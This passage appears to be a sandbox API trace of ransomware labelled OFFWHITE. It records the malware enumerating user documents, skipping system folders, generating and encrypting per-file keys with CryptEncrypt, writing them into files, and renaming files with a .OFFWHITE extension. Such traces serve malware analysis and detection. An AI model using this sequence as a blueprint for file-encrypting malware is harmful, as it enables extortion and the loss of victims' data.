a8wg_\\me1jQJbh7TN.ods") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods" [0133.225] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods.OFFWHITE" [0133.225] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\me1jqjbh7tn.ods"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\me1jqjbh7tn.ods.offwhite")) returned 1 [0133.226] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0638160, ftCreationTime.dwHighDateTime=0x1d5dcae, ftLastAccessTime.dwLowDateTime=0x779a32c0, ftLastAccessTime.dwHighDateTime=0x1d5d882, ftLastWriteTime.dwLowDateTime=0x779a32c0, ftLastWriteTime.dwHighDateTime=0x1d5d882, nFileSizeHigh=0x0, nFileSizeLow=0x13af9, dwReserved0=0x295c4bc, dwReserved1=0x53dc9589, cFileName="PdOxX1m1M0iigGy.ots", cAlternateFileName="PDOXX1~1.OTS")) returned 1 [0133.226] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2=".") returned 1 [0133.226] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="..") returned 1 [0133.226] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="...") returned 1 [0133.226] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="windows") returned -1 [0133.226] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="$recycle.bin") returned 1 [0133.226] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="rsa") returned -1 [0133.226] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="ntuser.dat") returned 1 [0133.226] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="programdata") returned -1 [0133.227] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="appdata") returned 1 [0133.227] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="program files") returned -1 [0133.227] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="program files (x86)") returned -1 [0133.227] lstrcpyW (in: lpString1=0x295c768, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" [0133.227] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\", lpString2="PdOxX1m1M0iigGy.ots" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots" [0133.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.227] PathFindExtensionW (pszPath="PdOxX1m1M0iigGy.ots") returned=".ots" [0133.227] lstrcmpiW (lpString1=".ots", lpString2=".exe") returned 1 [0133.227] lstrcmpiW (lpString1=".ots", lpString2=".log") returned 1 [0133.227] lstrcmpiW (lpString1=".ots", lpString2=".cab") returned 1 [0133.227] lstrcmpiW (lpString1=".ots", lpString2=".cmd") returned 1 [0133.227] lstrcmpiW (lpString1=".ots", lpString2=".com") returned 1 [0133.227] lstrcmpiW (lpString1=".ots", lpString2=".cpl") returned 1 [0133.227] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0133.228] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0133.228] lstrcmpiW (lpString1=".ots", lpString2=".url") returned -1 [0133.228] lstrcmpiW (lpString1=".ots", lpString2=".ttf") returned -1 [0133.228] lstrcmpiW (lpString1=".ots", lpString2=".mp3") returned 1 [0133.228] lstrcmpiW (lpString1=".ots", lpString2=".pif") returned -1 [0133.228] lstrcmpiW (lpString1=".ots", lpString2=".mp4") returned 1 [0133.228] lstrcmpiW (lpString1=".ots", lpString2=".OFFWHITE") returned 1 [0133.228] lstrcmpiW (lpString1=".ots", lpString2=".msi") returned 1 [0133.228] lstrcmpiW (lpString1="PdOxX1m1M0iigGy.ots", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0133.228] GetProcessHeap () returned 0x500000 [0133.228] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f6f8 [0133.228] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\pdoxx1m1m0iiggy.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0133.228] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x295c4e0 | out: lpFileSize=0x295c4e0*=80633) returned 1 [0133.229] GetProcessHeap () returned 0x500000 [0133.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.229] GetProcessHeap () returned 0x500000 [0133.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.229] GetProcessHeap () returned 0x500000 [0133.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.229] GetProcessHeap () returned 0x500000 [0133.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.229] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.229] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.229] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.229] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.229] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.229] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.229] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.229] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.229] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c290*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c290*=0x100) returned 1 [0133.229] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.229] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.230] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c28c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c28c*=0x100) returned 1 [0133.230] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x13af9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.230] SetLastError (dwErrCode=0x0) [0133.230] WriteFile (in: hFile=0x20c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0133.232] GetLastError () returned 0x0 [0133.232] GetLastError () returned 0x0 [0133.232] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x13bf9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.232] WriteFile (in: hFile=0x20c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0133.232] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x13cf9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.232] WriteFile (in: hFile=0x20c, lpBuffer=0x53f6f8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x53f6f8*, lpNumberOfBytesWritten=0x295c4cc*=0x8, lpOverlapped=0x0) returned 1 [0133.232] GetProcessHeap () returned 0x500000 [0133.232] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x13af9) returned 0x55e7d8 [0133.232] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.233] ReadFile (in: hFile=0x20c, lpBuffer=0x55e7d8, nNumberOfBytesToRead=0x13af9, lpNumberOfBytesRead=0x295c4c0, lpOverlapped=0x0 | out: lpBuffer=0x55e7d8*, lpNumberOfBytesRead=0x295c4c0*=0x13af9, lpOverlapped=0x0) returned 1 [0133.238] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.238] WriteFile (in: hFile=0x20c, lpBuffer=0x55e7d8*, nNumberOfBytesToWrite=0x13af9, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x55e7d8*, lpNumberOfBytesWritten=0x295c4cc*=0x13af9, lpOverlapped=0x0) returned 1 [0133.238] GetProcessHeap () returned 0x500000 [0133.239] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55e7d8 | out: hHeap=0x500000) returned 1 [0133.239] CloseHandle (hObject=0x20c) returned 1 [0133.241] GetProcessHeap () returned 0x500000 [0133.241] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.241] GetProcessHeap () returned 0x500000 [0133.241] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.241] GetProcessHeap () returned 0x500000 [0133.241] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.241] GetProcessHeap () returned 0x500000 [0133.241] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.241] lstrcpyW (in: lpString1=0x295c2b8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots" [0133.241] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots.OFFWHITE" [0133.241] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\pdoxx1m1m0iiggy.ots"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\PdOxX1m1M0iigGy.ots.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\pdoxx1m1m0iiggy.ots.offwhite")) returned 1 [0133.242] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0638160, ftCreationTime.dwHighDateTime=0x1d5dcae, ftLastAccessTime.dwLowDateTime=0x779a32c0, ftLastAccessTime.dwHighDateTime=0x1d5d882, ftLastWriteTime.dwLowDateTime=0x779a32c0, ftLastWriteTime.dwHighDateTime=0x1d5d882, nFileSizeHigh=0x0, nFileSizeLow=0x13af9, dwReserved0=0x295c4bc, dwReserved1=0x53dc9589, cFileName="PdOxX1m1M0iigGy.ots", cAlternateFileName="PDOXX1~1.OTS")) returned 0 [0133.242] FindClose (in: hFindFile=0x5447d0 | out: hFindFile=0x5447d0) returned 1 [0133.242] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac13e20, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0xec40a660, ftLastAccessTime.dwHighDateTime=0x1d5e636, ftLastWriteTime.dwLowDateTime=0xec40a660, ftLastWriteTime.dwHighDateTime=0x1d5e636, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295cb3c, dwReserved1=0xc9372cc9, cFileName="xd1gnEP a8wg_", cAlternateFileName="XD1GNE~1")) returned 0 [0133.242] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0133.242] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a36610, ftCreationTime.dwHighDateTime=0x1d5e152, ftLastAccessTime.dwLowDateTime=0x44561fe0, ftLastAccessTime.dwHighDateTime=0x1d5e2c4, ftLastWriteTime.dwLowDateTime=0x44561fe0, ftLastWriteTime.dwHighDateTime=0x1d5e2c4, nFileSizeHigh=0x0, nFileSizeLow=0x510, dwReserved0=0x295d1bc, dwReserved1=0x4a1c9356, cFileName="g38ZPKTnVtQWvlgJ_n4u.ppt", cAlternateFileName="G38ZPK~1.PPT")) returned 1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2=".") returned 1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="..") returned 1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="...") returned 1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="windows") returned -1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="$recycle.bin") returned 1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="rsa") returned -1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="ntuser.dat") returned -1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="programdata") returned -1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="appdata") returned 1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="program files") returned -1 [0133.242] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="program files (x86)") returned -1 [0133.242] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" [0133.242] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\", lpString2="g38ZPKTnVtQWvlgJ_n4u.ppt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt" [0133.242] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.242] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.242] PathFindExtensionW (pszPath="g38ZPKTnVtQWvlgJ_n4u.ppt") returned=".ppt" [0133.242] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".com") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".cpl") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".url") returned -1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".mp3") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".pif") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".mp4") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".OFFWHITE") returned 1 [0133.243] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0133.243] lstrcmpiW (lpString1="g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.243] GetProcessHeap () returned 0x500000 [0133.243] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f708 [0133.243] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\g38zpktnvtqwvlgj_n4u.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0133.243] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=1296) returned 1 [0133.243] GetProcessHeap () returned 0x500000 [0133.243] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.244] GetProcessHeap () returned 0x500000 [0133.244] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.244] GetProcessHeap () returned 0x500000 [0133.244] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.244] GetProcessHeap () returned 0x500000 [0133.244] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.244] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.244] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.244] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.244] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.244] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.244] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.244] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.244] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.244] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x100) returned 1 [0133.244] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.244] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.244] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0133.245] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.245] SetLastError (dwErrCode=0x0) [0133.245] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0133.246] GetLastError () returned 0x0 [0133.247] GetLastError () returned 0x0 [0133.247] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x610, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.247] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0133.247] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x710, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.247] WriteFile (in: hFile=0x218, lpBuffer=0x53f708*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x53f708*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0133.247] GetProcessHeap () returned 0x500000 [0133.247] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x510) returned 0x521ec8 [0133.247] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.247] ReadFile (in: hFile=0x218, lpBuffer=0x521ec8, nNumberOfBytesToRead=0x510, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x521ec8*, lpNumberOfBytesRead=0x295d1c0*=0x510, lpOverlapped=0x0) returned 1 [0133.247] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.247] WriteFile (in: hFile=0x218, lpBuffer=0x521ec8*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x521ec8*, lpNumberOfBytesWritten=0x295d1cc*=0x510, lpOverlapped=0x0) returned 1 [0133.247] GetProcessHeap () returned 0x500000 [0133.247] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x521ec8 | out: hHeap=0x500000) returned 1 [0133.247] CloseHandle (hObject=0x218) returned 1 [0133.253] GetProcessHeap () returned 0x500000 [0133.253] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.253] GetProcessHeap () returned 0x500000 [0133.253] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.253] GetProcessHeap () returned 0x500000 [0133.253] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.253] GetProcessHeap () returned 0x500000 [0133.253] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.253] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt" [0133.253] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS 